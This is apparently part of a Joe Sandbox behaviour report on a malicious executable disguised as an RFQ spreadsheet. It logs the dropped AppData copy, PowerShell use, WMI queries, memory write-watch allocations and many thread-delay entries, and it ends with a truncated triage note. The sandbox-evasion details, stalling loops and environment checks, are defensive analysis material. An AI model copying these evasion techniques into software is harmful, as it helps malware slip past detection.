                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Process information set: NOOPENFILEERRORBOX (96 identical entries)

Malware Analysis System Evasion

Source: Yara match | File source: Process Memory Space: RFQ-101432620247fl#U00e2#U00aexslx.exe PID: 3964, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: ywKDUBCUA.exe PID: 2260, type: MEMORYSTR
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Memory allocated: E90000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Memory allocated: 2860000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Memory allocated: 4860000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Memory allocated: 8970000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Memory allocated: 9970000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Memory allocated: 9C70000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Memory allocated: AC70000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Memory allocated: 14B0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Memory allocated: 3210000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Memory allocated: 3090000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Memory allocated: 16D0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Memory allocated: 3070000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Memory allocated: 5070000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Memory allocated: 8C80000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Memory allocated: 9C80000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Memory allocated: 8C80000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Memory allocated: EE0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Memory allocated: 2CB0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Memory allocated: 1060000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Thread delayed: delay time: 1200000
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Thread delayed: delay time: 1199891
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Thread delayed: delay time: 1199766
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Thread delayed: delay time: 1199656
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Thread delayed: delay time: 1199547
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Thread delayed: delay time: 1199435
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Thread delayed: delay time: 1199328
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Thread delayed: delay time: 1199219
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Thread delayed: delay time: 1199109
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Thread delayed: delay time: 1199000
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Thread delayed: delay time: 1198889
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Thread delayed: delay time: 1198781
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Thread delayed: delay time: 1198672
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Thread delayed: delay time: 1198563
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Thread delayed: delay time: 1198453
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Thread delayed: delay time: 1198344
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Thread delayed: delay time: 1198234
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Thread delayed: delay time: 1198125
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Thread delayed: delay time: 1198016
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Thread delayed: delay time: 1197906
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Thread delayed: delay time: 1197797
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Thread delayed: delay time: 1197688
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Thread delayed: delay time: 1197563
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Thread delayed: delay time: 1197438
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Thread delayed: delay time: 1197313
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Thread delayed: delay time: 1197203
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Thread delayed: delay time: 1197094
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Thread delayed: delay time: 1196969
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Thread delayed: delay time: 1196859
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Thread delayed: delay time: 1196681
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Thread delayed: delay time: 1196531
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Thread delayed: delay time: 1196422
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Thread delayed: delay time: 1196312
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Thread delayed: delay time: 1196203
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Thread delayed: delay time: 1196094
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Thread delayed: delay time: 1195984
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Thread delayed: delay time: 1195875
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Thread delayed: delay time: 1195766
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Thread delayed: delay time: 1195656
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Thread delayed: delay time: 1195547
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Thread delayed: delay time: 1195438
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Thread delayed: delay time: 1195313
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Thread delayed: delay time: 1195188
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Thread delayed: delay time: 1195063
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Thread delayed: delay time: 1194953
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Thread delayed: delay time: 1194844
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Thread delayed: delay time: 1194719
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Thread delayed: delay time: 1194609
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Thread delayed: delay time: 1194500
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Thread delayed: delay time: 1194391
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Thread delayed: delay time: 1194281
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Thread delayed: delay time: 1200000
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Thread delayed: delay time: 1199874
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Thread delayed: delay time: 1199764
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Thread delayed: delay time: 1199656
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Thread delayed: delay time: 1199546
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Thread delayed: delay time: 1199250
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Thread delayed: delay time: 1199125
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Thread delayed: delay time: 1199015
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Thread delayed: delay time: 1198906
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Thread delayed: delay time: 1198796
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Thread delayed: delay time: 1198687
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Thread delayed: delay time: 1198578
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Thread delayed: delay time: 1198468
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Thread delayed: delay time: 1198359
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Thread delayed: delay time: 1198250
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Thread delayed: delay time: 1198140
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Thread delayed: delay time: 1198031
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Thread delayed: delay time: 1197921
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Thread delayed: delay time: 1197812
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Thread delayed: delay time: 1197703
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Thread delayed: delay time: 1197593
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Thread delayed: delay time: 1197484
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Thread delayed: delay time: 1197373
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Thread delayed: delay time: 1197265
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Thread delayed: delay time: 1197156
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Thread delayed: delay time: 1197046
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Thread delayed: delay time: 1196937
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Thread delayed: delay time: 1196828
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Thread delayed: delay time: 1196718
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Thread delayed: delay time: 1196609
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Thread delayed: delay time: 1196500
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Thread delayed: delay time: 1196390
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Thread delayed: delay time: 1196281
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Thread delayed: delay time: 1196171
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Thread delayed: delay time: 1196060
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Thread delayed: delay time: 1195951
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Thread delayed: delay time: 1195843
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Thread delayed: delay time: 1195734
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Thread delayed: delay time: 1195624
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Thread delayed: delay time: 1195515
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Thread delayed: delay time: 1195406
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Thread delayed: delay time: 1195296
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Thread delayed: delay time: 1195187
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Thread delayed: delay time: 1195078
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Thread delayed: delay time: 1194954
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Thread delayed: delay time: 1194730
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Thread delayed: delay time: 1194598
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Thread delayed: delay time: 1194308
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Thread delayed: delay time: 1194202
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Thread delayed: delay time: 1194093
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Thread delayed: delay time: 1193982
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 8249
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1391
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 8012
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1532
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Window / User API: threadDelayed 3254
Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe | Window / User API: threadDelayed 6595
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Window / User API: threadDelayed 7343
Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe | Window / User API: threadDelayed 2516
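Triage note with an added example (the helper below is not part of the Joe Sandbox report and is not code from the sample). The stalling entries in this section read more easily once two things are pinned down. First, 922337203685477 is TimeSpan.MaxValue expressed in milliseconds (9223372036854775807 ticks of 100 ns divided by 10000), so the delay figures are milliseconds despite the "s" suffix on the sleep-time lines: 1200000 is a 20-minute deadline, and the run 1200000, 1199891, 1199766, ... stepping down by roughly 110 ms per call is consistent with a loop that sleeps in short slices and re-checks the time left, which is what survives a sandbox that merely skips or shortens one long sleep. The per-thread sleep-time totals are exact multiples of that constant: 29514790517935264 is 32 x 922337203685477, matching the sleep count of 32 reported for TID 7436, and the two PowerShell totals are 12 and 9 multiples. Second, reserving memory with MEM_WRITE_WATCH is also what the .NET garbage collector does for its heap segments, so on a .NET sample that signature is weak on its own, and Win32_NetworkAdapterConfiguration is equally how a stealer reads the 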